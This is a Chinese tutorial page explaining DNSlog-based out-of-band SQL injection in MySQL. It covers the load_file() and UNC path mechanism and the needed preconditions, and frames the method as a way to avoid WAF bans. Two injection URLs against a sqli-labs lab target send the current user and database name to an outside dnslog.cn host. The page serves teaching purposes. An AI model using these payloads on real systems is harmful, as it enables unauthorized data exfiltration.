脚本之家 服务器常用软件
快捷导航
您的位置:首页网站技巧服务器DNS服务器 → DNS log注入原理

DNS log注入原理解析

 更新时间:2023年05月23日 10:27:17   作者:XD前端  
这篇文章主要介绍了DNS log注入原理解析,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下

核心:

将盲注转换为显错注入

原理:

通常我们面对SQL注入过程中没有回显的情况下,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度,也许你也可以使用代理池

我们输入域名之后 我们的本地域名服务器会把在自身服务器里面查询是否存在ip地址 如果没有则发送到根域名服务器 如果根域名服务器里面有对应的记录则返回 如果没有则告诉本地域名服务器去向顶级域名服务器查找。

dns在解析的时候会留下记录。

当dns服务器是我们自己的时,我们就可以通过查看日志来查询一些信息

什么是UNC?

UNC路径就是类似\softer这样的形式的网络路径。它符合 \servername\sharename 格式,其中 servername 是服务器名,sharename 是共享资源的名称。

注入所需条件?

首先说明,dns带外查询属于MySQL注入,在MySQL中有个系统属性

secure_file_priv特性,有三种状态:

secure_file_priv为null    表示不允许导入导出
secure_file_priv指定文件夹时,表示mysql的导入导出只能发生在指定的文件夹
secure_file_priv没有设置时,则表示没有任何限制
可了解一下load_file和outfile

LOAD_FILE()函数:LOAD_FILE()函数读取一个文件并将其内容作为字符串返回 

语法为:load_file(file_name),其中file_name是文件的完整路径

不管是布尔类型盲注还是时间盲注,都需要发送大量的数据包去判断数据,而这很可能会触发WAF的防护,因此导致被封IP。所以,如果条件允许,我们可以结合DNSlog来快速的回显数据。MySQL数据库,通过DNSlog盲注需要用到 load_file() 函数,该函数不仅能加载本地文件,同时也能对URL发起请求。因为需要使用 load_file() 函数,所以需要root权限,并且 secure_file_priv 需要为空。并且服务器要为Windows操作系统。

注入语句:

# 查询当前用户名
http://192.168.157.129/sql-labs/Less-1/?id=1' and (select load_file(concat('\\\\',(select hex(user())),'.682y4b.dnslog.cn/abc'))) --+
# 查看当前数据库名
http://192.168.157.129/sql-labs/Less-1/?id=1' and (select load_file(concat('\\\\',(select database()),'.682y4b.dnslog.cn/abc'))) --+

到此这篇关于DNS log注入原理的文章就介绍到这了,更多相关DNS log注入原理内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!

您可能感兴趣的文章:

相关文章

  • win2003 DNS服务器配置方法[图文详解]

    win2003 DNS服务器配置方法[图文详解]

    目前很多企业事业单位都建立了单位内部的局域网,网络内部都配备相关的服务器(如web、ftp等服务器)。内部网络的用户都希望所有的服务器都用域名来访问,网络管理员可以采用在内部搭建DNS服务器的方式来实现
    2012-10-10
  • DNS log注入原理解析

    DNS log注入原理解析

    这篇文章主要介绍了DNS log注入原理解析,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下
    2023-05-05
  • DNSLog使用方法及场景分析

    DNSLog使用方法及场景分析

    这篇文章主要介绍了DNSLog使用方法,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下
    2023-05-05
  • Windows Server 2019 DNS服务器的配置与管理之DNS反向解析

    Windows Server 2019 DNS服务器的配置与管理之DNS反向解析

    这篇文章主要介绍了Windows Server 2019 DNS服务器的配置与管理之DNS反向解析,需要的朋友可以参考下
    2023-05-05
  • 新网互联 域名 泛解析设置方法

    新网互联 域名 泛解析设置方法

    好多朋友需要使用泛解析,其实什么是泛解析,和泛解析有什么好处呢。大家看完这篇文章就知道了。
    2009-06-06
  • 如何查看本机DNS服务器地址

    如何查看本机DNS服务器地址

    本地DNS地址是指你的计算机或路由器使用的DNS服务器的IP地址,本文就来介绍一下如何查看本机DNS服务器地址,具有一定的参考价值,感兴趣的可以了解一下
    2023-10-10
  • DNS原理及其解析过程剖析(图文)

    DNS原理及其解析过程剖析(图文)

    我们无法记住10个以上IP地址的网站,所以我们访问网站时,更多的是在浏览器地址栏中输入域名,就能看到所需要的页面,这是因为有一个叫DNS服务器的计算机自动把我们的域名翻译成了相应的IP地址,然后调出IP地址所对应的网页
    2012-09-09
  • Windows Server 2019 DNS服务器的配置与管理之DNS子域委派

    Windows Server 2019 DNS服务器的配置与管理之DNS子域委派

    这篇文章主要介绍了Windows Server 2019 DNS服务器的配置与管理之DNS子域委派,需要的朋友可以参考下
    2023-05-05
  • DNS服务器的安装与配置步骤

    DNS服务器的安装与配置步骤

    本文主要介绍了DNS服务器的安装与配置步骤,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
    2023-06-06
  • win2003服务器搭建DNS服务器配置图解教程(比较详细)

    win2003服务器搭建DNS服务器配置图解教程(比较详细)

    DNS简单地说,就是Domain Name System(域名系统)。在一个以TCP/IP协议为主的网络环境中,DNS是一个非常重要而且常用的系统。其主要的功能就是将我们容易记忆的网址域名(Domain Name)与不容易记忆的IP地址作自动解析互换
    2012-05-05

最新评论